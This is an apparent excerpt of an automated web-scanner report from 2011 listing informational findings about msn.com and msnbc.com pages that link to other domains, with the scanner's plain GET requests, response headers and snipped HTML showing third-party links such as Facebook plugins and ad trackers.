<h2>Object moved to <a href="http://en-us.facebook.com/login.php?api_key=8f8fa7ab966b3be82807212858019588&display=popup&extern=1&fbconnect=true&return_session=1&req_perms=read_stream,user_status&v=1.0&next=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d8%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d&cancel_url=http%3a%2f%2fwww.msn.com%2fscp%2fAuthServiceFacebook.aspx%3fredirectTo%3d7%26mkt%3den-US%26format%3dHomepage%26unifiedSignIn%3dFalse%26SPSAdapterAlias%3d%26WLProductID%3d">here</a>
...[SNIP]...

17.297. http://www.msn.com/scp/AuthServiceFacebookLogOff.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/scp/AuthServiceFacebookLogOff.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.msn.com/scp/AuthServiceFacebookLogOff.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following links to other domains:

http://col.stc.s-msn.com/br/sc/i/A5/13721023C2BA909660AFAA5030D10F.png
http://col.stc.s-msn.com/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico

Request

GET /scp/AuthServiceFacebookLogOff.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: facebook_userid=; expires=Tue, 01-Feb-2011 16:03:27 GMT; path=/; HttpOnly
Set-Cookie: facebook_session_key=; domain=www.msn.com; expires=Tue, 01-Feb-2011 16:03:27 GMT; HttpOnly
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 1234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<met
...[SNIP]...
</title>
<link rel="SHORTCUT ICON" href="http://col.stc.s-msn.com/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico" type="image/x-icon" />
</head>
...[SNIP]...
<h1><img src="http://col.stc.s-msn.com/br/sc/i/A5/13721023C2BA909660AFAA5030D10F.png" alt="MSN" /></h1>
...[SNIP]...

17.298. http://www.msn.com/scp/AuthServiceTwitter.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msn.com
Path:	/scp/AuthServiceTwitter.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.msn.com/scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage

The response contains the following links to other domains:

http://col.stc.s-msn.com/br/sc/i/A5/13721023C2BA909660AFAA5030D10F.png
http://col.stc.s-msn.com/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico

Request

GET /scp/AuthServiceTwitter.aspx?redirectTo=0&mkt=en-us&format=Homepage HTTP/1.1
Host: www.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:03:35 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA40
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: twitter_userid=; expires=Tue, 01-Feb-2011 16:03:35 GMT; path=/; HttpOnly
Set-Cookie: twitter_auth_token=; domain=www.msn.com; expires=Tue, 01-Feb-2011 16:03:35 GMT; HttpOnly
Set-Cookie: twitter_auth_secret=; domain=www.msn.com; expires=Tue, 01-Feb-2011 16:03:35 GMT; HttpOnly
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 1213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<met
...[SNIP]...
</title>
<link rel="SHORTCUT ICON" href="http://col.stc.s-msn.com/br/sc/i/DF/854F4951FCBF6C450892031DA153B1.ico" type="image/x-icon" />
</head>
...[SNIP]...
<h1><img src="http://col.stc.s-msn.com/br/sc/i/A5/13721023C2BA909660AFAA5030D10F.png" alt="MSN" /></h1>
...[SNIP]...

17.299. http://www.msnbc.msn.com/id/21134540/vp/41348830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/21134540/vp/41348830

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/21134540/vp/41348830?from=en-us_msnhp&gt1=43001

The response contains the following links to other domains:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.msn.com%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;

Request

GET /id/21134540/vp/41348830?from=en-us_msnhp&gt1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:47 GMT
Date: Wed, 02 Feb 2011 16:03:47 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;

...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.msn.com%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...

17.300. http://www.msnbc.msn.com/id/21134540/vp/41365925 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/21134540/vp/41365925

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/21134540/vp/41365925?from=en-us_msnhp&GT1=43001

The response contains the following links to other domains:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.msn.com%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21
http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;

Request

GET /id/21134540/vp/41365925?from=en-us_msnhp&GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Wed, 02 Feb 2011 16:03:46 GMT
Date: Wed, 02 Feb 2011 16:03:46 GMT
Content-Length: 3959
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<html><head><title>msnbc.com Video Player</title>

<style type="text/css">
#fb_header{
background: #CCC;
color: #333;
font: 11px "Lucida Grande",Arial,sans-serif;
height: 33px;

...[SNIP]...
</span>
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fmsnbc&layout=button_count&show_faces=false&width=100&action=like&font=lucida+grande&colorscheme=light&height=21;" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:100px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<span id="fb_frame">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.msnbc.msn.com%2F21134540&layout=button_count&show_faces=false&width=135&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:135px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...

17.301. http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41274431/ns/world_news-weird_news/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://media.nbcnewyork.com/images/527*298/long+island+cellphone+tower.jpg
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://thomsonreuters.com/products_services/media/brand_guidelines/legal_notice/
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/Mark.Stevenson.at.msnbc
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41274431/ns/world_news-weird_news/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.302. http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41292533/ns/technology_and_science-science/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://news.bbc.co.uk/2/hi/science/nature/4713323.stm
http://news.discovery.com/animals/mouse-tweets-genetic-modification-101221.html
http://nightly.msnbc.com/
http://onlinelibrary.wiley.com/doi/10.1002/anie.201000679/abstract
http://rachel.msnbc.com/
http://rsbl.royalsocietypublishing.org/content/early/2010/12/18/rsbl.2010.1056
http://service.collarity.com/cust/msnbc/ucs.js
http://spectrum.ieee.org/robotics/artificial-intelligence/moneta-a-mind-made-from-memristors
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.ams.org/news/math-in-the-media/mmarc-10-2000-media
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.guardian.co.uk/education/2005/mar/08/highereducation.research
http://www.hotmail.com/
http://www.neurdon.com/about-synapse/
http://www.newsvine.com/
http://www.youtube.com/kentanimalpark
http://www.youtube.com/watch?v=6QQpL4BhtAI
http://www.youtube.com/watch?v=EzVxsYzXI_Y
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41292533/ns/technology_and_science-science/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Wed, 02 Feb 2011 16:04:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 101603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.msn.com/j/MSNBC/Components/Photo/_new/pb-110126-upright-ape-whalen-01a.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">

<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/"></a>
...[SNIP]...
<p>She <a href="http://www.youtube.com/kentanimalpark#p/u/1/CrQf6cogMuI">posted the clip on YouTube</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/"></a>
...[SNIP]...
</a>, and learn more about the bizarre study of a <a href="http://www.guardian.co.uk/education/2005/mar/08/highereducation.research">homosexual necrophiliac duck</a>
...[SNIP]...
</a>, of course, but he realizes this is a grossly oversimplified description of the <a href="http://www.neurdon.com/about-synapse/">SyNAPSE project</a>
...[SNIP]...
<p>The technology could produce smarter robotic scout vehicles for the U.S. military, <a href="http://spectrum.ieee.org/robotics/artificial-intelligence/moneta-a-mind-made-from-memristors">IEEE Spectrum reports</a>
...[SNIP]...
<p>Biologists from Sheffield and Warwick universities reported that ovocleidin-17, a protein found in a chicken's ovaries, <a href="http://onlinelibrary.wiley.com/doi/10.1002/anie.201000679/abstract">played an essential role</a>
...[SNIP]...
te-chicken laid an egg that contained the first honest-to-goodness chicken, based on its genetic coding, do you count that as a chicken, or a chicken egg? Try using that one if you're ever captured by <a href="http://www.youtube.com/watch?v=EzVxsYzXI_Y">"Star Trek" androids</a>
...[SNIP]...
<p>First, the scientists used slime mold's food-finding prowess to <a href="http://www.ams.org/news/math-in-the-media/mmarc-10-2000-media#slime">solve labyrinth puzzles</a>
...[SNIP]...
<p>Even if the antler bone is judged to be a sex toy, it's not the oldest of its type: A <a href="http://news.bbc.co.uk/2/hi/science/nature/4713323.stm">polished stone phallus</a>
...[SNIP]...
<strong><a href="http://news.discovery.com/animals/mouse-tweets-genetic-modification-101221.html"><strong>
...[SNIP]...
rchers happened upon a mouse that made tweeting noises like a bird. The tweeting trait could be passed along to the generations that followed, and the lab says it now has more than 100 "singing mice." <a href="http://www.youtube.com/watch?v=6QQpL4BhtAI">Listen to the chirping mice on YouTube</a>
...[SNIP]...
</a> One of the more unusual papers published in Biology Letters was illustrated with diagrams that looked as if they were scrawled by elementary-school students. That's because they were. The <a href="http://rsbl.royalsocietypublishing.org/content/early/2010/12/18/rsbl.2010.1056">peer-reviewed report</a>
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7543"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

17.303. http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41299984/ns/health-cancer/from/toolbar

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7542
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41299984/ns/health-cancer/from/toolbar?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.304. http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41354775/ns/business-business_of_super_bowl_xlv/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/?gt1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
http://www.walletpop.com/2011/02/02/eight-ways-that-non-profit-credit-counseling-can-help-you-fast/
http://www.walletpop.com/2011/02/02/five-ways-to-fix-social-security-before-it-runs-dry/
http://www.walletpop.com/2011/02/02/how-the-crisis-in-egypt-will-impact-your-wallet/
http://www.walletpop.com/2011/02/02/i-didnt-get-my-packages-from-sears-help-me-walletpop/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41354775/ns/business-business_of_super_bowl_xlv/?gt1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Wed, 02 Feb 2011 16:04:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 79343

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia4.msn.com/j/ap/food super bowl pizza sales--527025753_v2.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">

<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/"></a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li class="i1 " about="http://www.walletpop.com/2011/02/02/eight-ways-that-non-profit-credit-counseling-can-help-you-fast/">

<a class="h6" href="http://www.walletpop.com/2011/02/02/eight-ways-that-non-profit-credit-counseling-can-help-you-fast/">

<span property="dc:title">
...[SNIP]...
